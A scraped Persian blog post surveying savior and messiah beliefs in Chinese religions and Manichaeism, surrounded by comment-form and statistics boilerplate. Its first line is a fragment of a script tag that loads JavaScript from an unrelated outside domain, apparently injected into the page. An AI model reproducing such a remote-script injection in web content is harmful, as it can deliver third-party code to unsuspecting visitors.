script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> موعود در ادیان دیگر
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند
شنبه 19 شهريور 1390برچسب:موعود,منجی,موعود در ادیان دیگر, :: 13:27 ::  نويسنده : زارعی

1. مثلاً در کشور چين دين کنفوسيوس در کنار دائو ديده مي‌شود؛ زيرا کنفوسيوس عهده‌دار تبيين فلسفه سياسي، اخلاقي و اجتماعي چيني‌ها است. در حالي‌که آيين دائو، بيان جهان‌بيني عرفاني آنهاست. لذا کنفوسيوس وعدة دقيقي در اين زمينه ندارد؛ اگر چه شعار بازگشت به عصر فرزانه شاهان باستان را سرلوحه  انديشه هاي اصلاحي خويش قرار داده است. ايجاد حکومتي همانند حکومت پادشاهان باستان از آرمان اصلي وي تلقي مي شود و شخص خاصي را وعده نمي دهد.
در حالي‌که تفکر موعودخواهي در دائو پررنگ‌تر ديده مي‌شود، مي توان در اين‌باره به دو نمونه اشاره کرد؛
1. نمونه اول، برپاية متن shang ـ ching hou ـ sheng tao chun ligh ـ chi «زندگي قديس آخرالزمان و پروردگار طريقت» نوشته شانگ چينگ، در يک سال جن ـ چن (jen ـ chen) يعني بيست‌ونهمين سال از دورة شصت ساله، «لي هونگ» (Li Hung) ظهور خواهد کرد تا جهاني نو برپا کند که در آن، برگزيدگان تحت حکومت «قديس آخرالزمان» بزييند.
2. نمونه دوم، موعودباوري عميق آيين دائو، ظهور و بروز جريان پيامبران دروغين و مدعيان نجات‌گري در تاريخ تحولات آن آيين است. ميرچا الياده در دايره‌المعارف دين از متني نام مي برد که به ماجراي اين مدعيان پرداخته است.  همة اينها حکايت از جدي بودن انديشة موعودخواهي چينيان کنفوسيوس و دائويي دارد.
مشخصات کلي موعود چينيان با توجه به آيين سه گانه کنفوسيوس دائويي، بودايي مي توان گفت به شرح ذيل است:
- نجات‌بخشي جمعي دارد.
- خصوصيت جهان شمولي دارد.
رو به گذشته زرين دارد. زيرا چينيان به شدت تحت تأثير کنفوسيوس هستند که بازگشت به نظام فرزانة شاهان باستان را وعده داده است. اگر چه اين وعده اي است که بعدا محقق خواهد شد ولي ساختار فکري آن بر انديشه و الگوي پيشينيان شکل گرفته است.
3. اعتقاد به موعود در عقايد مانوي نيز خودنمايي مي‏كند. در انجيل زنده  كه از متون مقدس مانويان و منسوب به ماني است، ماني خود را فارقليط، يعني همان كه مسيح مژدة آمدنش را داده بود، مي‏داند. در زبور مانوي كه يكي ديگر از آثار ادبي ديني مانويان است و به پيروي از زبور داوود سروده شده، ماني همان فارقليط معرفي شده است:
او را بزرگ مي‏داريم
فارقليط، ماني را
پسر و روح‌القدس را؛ آنان را مي‏ستاييم با راستي!
البته در جايي ديگر نويد موعود ديگري به جز ماني داده شده است:
اي فارقليط! تو از عيسي نازل شده‏اي،
با صلح آمدي، اي خورشيد نوينِ جان‌هاي آدميان!
با صلح فراز آمدي، ‌اي خداوندگار ما، ماني!
بماي  تو را بستاييم و موعود نوين تو را.
در قطعة شمارة 9 اسناد مكشوفة تورفان Turfun (كلكسيون لنينگراد) پرسش‏هايي دربارة آخرالزمان و علامات آن مطرح مي‏شود. اين اسناد، سال‏ها پس از زمان ماني نوشته شده است، ولي از آنها چنين بر مي‏آيد كه پيروان ماني به ظهور وي در آخرالزمان معتقد بوده‏اند. قسمت‏هايي از كتاب شاپورگان  ماني که وجود دارد اشاره به ظهور ماني نشده است، امّا از قراين چنين به دست مي‏آيد كه انتظار ظهور عيسي را دارند. در شاپورگان ترجمة «‏مولر» (muller) نام «‏خرديشهر ايزد»  آمده كه در آخرالزمان بايد ظهور كند. جكسون عقيده دارد كه بي‏شك عيسي به اين لقب ناميده شده است.   در نيايشي دربارة آمدن دوبارة عيسي چنين مي‏خوانيم:
به من بگو‌اي شهريار، آريامان! 
نشانم ده، ‌اي گرامي‏ترين پسر!
دربارة زمان آمدنت، هنگامي كه سرانجام مي‏آيي.
اي منجي بزرگ، ‌اي آموزگار من! بگو دربارة آن زمان و نشانه‏هاي آن.
به هر حال، وقايعي كه با ظهور مصادف مي‏‏شود، عبارتند از: علامات شگفت‏انگيزي كه در آسمان پديد مي‏آيد و بر آمدنِ «‏خرديشهر ايزد» دلالت مي‏كنند و دانش را پيش از تكميل فرشگرد به دنيا مي‏آورند. فرشتگاني از شرق و غرب به فرمان او فرستاده مي‏شوند و به همة اهل دنيا پيام مي‏فرستند؛ امّا اشخاص شرور، او را انكار مي‏كنند و كاذب مي‏شمارند. از طرف ديگر، پنج تن از نگهبانان پيروزگر آسمان‏ها و زمين‏ها با پرهيزگاران و ديوان فروتن به پرستش او سر فرود مي‏آورند.  براي مطالعه مي‌توان به مقالات پيرامون موعود اديان مراجعه كرد.
يادآوري
اين انديشه زنده را مي توان در اديان ديگر نظير اديان سرخ پوستي آفريقايي کم و بيش مشاهده کرد؛ اين چيزي است که هر انسان منصفي را به انديشه وا مي دارد که آيا اين يک خواسته و ميل دروني نيست و آيا اين اديان که همگي بشري و غيرابراهيمي هستند، در جهت پاسخگويي به يک نياز عمومي بشر حرکت نکرده‌اند؟ در همه اين اديان از زرتشت، هندو، بودا، کنفوسيوس، دائو، اديان سرخ‌پوستي، آفريقايي و نظاير آن مفهوم موعود مطرح شده است؛ اگرچه آنان آموزه موعود را مطابق آيين خود تعريف کردند و هر يک ويژگي هاي خاصي خود را دارند، ولي همه آنها در صدد پاسخ به يک ميل دروني انسان هستند و آن «تحقق بخشيدن ميل به نجات» مي باشد.


نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 8
بازدید دیروز : 4
بازدید هفته : 8
بازدید ماه : 260
بازدید کل : 33029
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1